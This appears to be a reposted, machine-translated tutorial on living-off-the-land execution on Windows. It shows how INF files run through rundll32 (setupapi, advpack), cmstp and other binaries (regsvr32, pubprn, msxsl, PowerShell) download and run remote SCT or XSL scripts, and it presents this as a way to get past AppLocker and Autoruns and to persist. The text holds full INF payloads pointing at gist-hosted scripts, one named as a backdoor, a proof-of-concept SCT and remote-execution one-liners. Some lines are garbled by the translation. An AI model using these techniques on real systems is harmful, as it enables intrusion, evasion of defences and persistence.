Shulou(Shulou.com)05/31 Report--

This article shows you how to use INF Script download execution technology to bypass, kill-free and persistence, the content is concise and easy to understand, can definitely brighten your eyes, through the detailed introduction of this article, I hope you can get something.

Brief introduction

Through some research and testing on MSDN dealing with different COM scripts, combined with online sharing, I found something interesting, which may be a new way to remotely invoke script execution.

The most interesting of these is LaunchINFSection.

This article mainly discusses the ways to make use of INF Script publicly available on the Internet, introduces LaunchINFSection, and finally shares some usage and things that defenders should pay attention to. In addition, some references are given for other methods of remote script execution.

INF Script execution method

The method of executing script files (.sct) through INF configuration files involves InstallHinfSection (setipapi.dll), CMSTP, and LaunchINFSection (advpack.dll).

Execute INF Script scripts using InstallHinfSection

KyleHanslovan and ChrisBisnett showed a very interesting thing in DerbyCon 2017, which I have translated and sorted out (Portal: see persistence bypass posture sharing through Autoruns). They showed a way to execute sct script files through INF remote calls:

Rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 [path to file.inf]

The INF file given by the author is as follows:

;-

; Required Sections

;-

[Version]

Signature=$CHICAGO$

Provider=test

Class=Printer

[Manufacturer]

HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64

;-

; Models Section

;-

[ModelsSection.NTx86]

UnregisterDlls = Squiblydoo

[ModelsSection.NTia64]

UnregisterDlls = Squiblydoo

[ModelsSection.NTamd64]

UnregisterDlls = Squiblydoo

;-

; Support Sections

;-

[DefaultInstall]

UnregisterDlls = Squiblydoo

[Squiblydoo]

11 pencils scrobj.dllj2 pencils 60, https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct

The above command invokes the default INF block, DefaultInstall, under which malicious commands under the Squiblydoo block are invoked through UnregisterDlls, and the specified script file is downloaded and executed through scrobj.dll.

Execute INF Script scripts using CMSTP

NickTyrer shows a way to load INF files with cmstp.exe to download SCT scripts and execute COM script files. Oddvarmoe has demonstrated using cmdtp.exe to bypass the default policies of UAC and AppLocker.

The basic usage is as follows:

Cmstp.exe / s [file]. Inf

The contents of the INF file are as follows:

; cmstp.exe / s cmstp.inf

[version]

Signature=$chicago$

AdvancedINF=2.5

[DefaultInstall_SingleUser]

UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]

11%\ scrobj.dll,NI, https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct

[Strings]

AppAct = "SOFTWARE\ Microsoft\ Connection Manager"

ServiceName= "Yay"

ShortSvcName= "Yay"

With the INF file above, cmstp.exe invokes the DefaultInstall_SingleUser block in the file. In this block, UnRegisterOCXs calls the UnRegisterOCXSection block to perform malicious operations, downloading and executing the specified SCT script file through scrobj.dll.

Execute INF Script scripts using LaunchINFSection

According to MSDN, LaunchINFSection is a method of Advanced INF Package Installer (advpack.dll) that invokes a block in the INF file. From an administrator's point of view, an INF file is an instruction file used to install device drivers or Windows .cab files, including the operation of registering Windows binaries (exe,dll,ocx), adding keys to the registry, or setting some key parameters.

The method to call LaunchINFSection is as follows:

Rundll32.exe advpack.dll,LaunchINFSection [file] .inf, [INFSection], [Path to Cab] .cab, [Installation Flags]

If you do not specify [INFSection], LaunchINFSection will call the default DefaultInstall block. In addition, it is worth noting that advpack.dll also provides LaunchINFSectionEX methods and LaunchINFSectionA compatible with other character sets to perform the same functions as LaunchINFSection.

As an example of PoC, we use the following INF and SCT files to test:

INF file (saved as test.inf):

; cmstp.exe / s cmstp.inf

[version]

Signature=$chicago$

AdvancedINF=2.5

[DefaultInstall_SingleUser]

UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]

11%\ scrobj.dll,NI, https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct

[Strings]

AppAct = "SOFTWARE\ Microsoft\ Connection Manager"

ServiceName= "Yay"

ShortSvcName= "Yay"

SCT file:

CDATA [

Var r = new ActiveXObject ("WScript.Shell") .Run ("calc.exe")

]] >

CDATA [

Function Exec ()

{

Var r = new ActiveXObject ("WScript.Shell") .Run ("notepad.exe")

}

]] >

Use the following command to execute:

Rundll32.exe advpack.dll,LaunchINFSection test.inf,DefaultInstall_SingleUser,1

If there is nothing wrong with the network, our lovely calculator will appear:

Here, we can also start our program in a slightly different way, for example, by changing the entry block in the INF file to DefaultInstall, so we can execute the program with the following command without specifying a block name:

Rundll32.exe advpack.dll,LaunchINFSection test.inf,1

In addition, we can change the command to uninstall OCX into an install / register command RegisterOCXs, and run our program under any name:

Use and defend against malware

Bypass, kill-free and persistence

CMSTP can be used to bypass Autoruns (when the hidden Windows entry is enabled), as shown below:

When hidden filtering is not enabled, CMSTP does the following self-startup items:

Note: LaunchINFSection and InstallHinfSection do not bypass the new version of Autoruns because this startup method relies on rundll32.exe to call the corresponding dll. Autoruns still displays these self-starting items when filtering is enabled. However, LaunchINFSection provides us with a technique for obtaining code execution by bypassing AppLocker rules through program whitelists.

Traffic in the network

The following figure shows the traffic generated when downloading a SCT file through scrobj.dll:

Any file name

SCT files are just text/XML documents, while INF files are just text documents with a suffix extension other than .sct or .inf, but it can still be executed successfully. The translator did not succeed in the experiment here. I hope you can give me some advice! )

Other methods

Using INF file execution is not the only way to execute SCT script files, there are some other ways:

RegSvr32/Scrobj.dll

RegSvr32/Scrobj.dll

Regsvr32 / s / n / u / i: http://url/file.sct scrobj.dll

PubPrn

PubPrn

Pubprn.vbs 127.0.0.1 script:http: / / url/file.sct

Splicing Microsoft.JScript.Eval through PowerShell

[Reflection.Assembly]:: LoadWithPartialName ('Microsoft.JScript'); [Microsoft.JScript.Eval]:: JScriptEvaluate (' GetObject ("script: http://url/file.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()))

Splicing Microsoft.VisualBasic.Interaction through PowerShell

[Reflection.Assembly]:: LoadWithPartialName ('Microsoft.VisualBasic'); [Microsoft.VisualBasic.Interaction]:: GetObject (' script: http://url/file.sct').Exec(0))

It is worth noting that sct is not the only file, there are other files, such as:

MsXSL

MsXSL

Msxsl.exe http://url/file.xml http://url/file.xsl

Splicing System.Xml.Xsl.XslCompiledTransform through PowerShell

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load ('http://url/file.xsl',$s,$r);$x.Transform('http://url/file.xml','z');del z

The above content is how to use INF Script download execution technology to bypass, kill-free and persistence, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.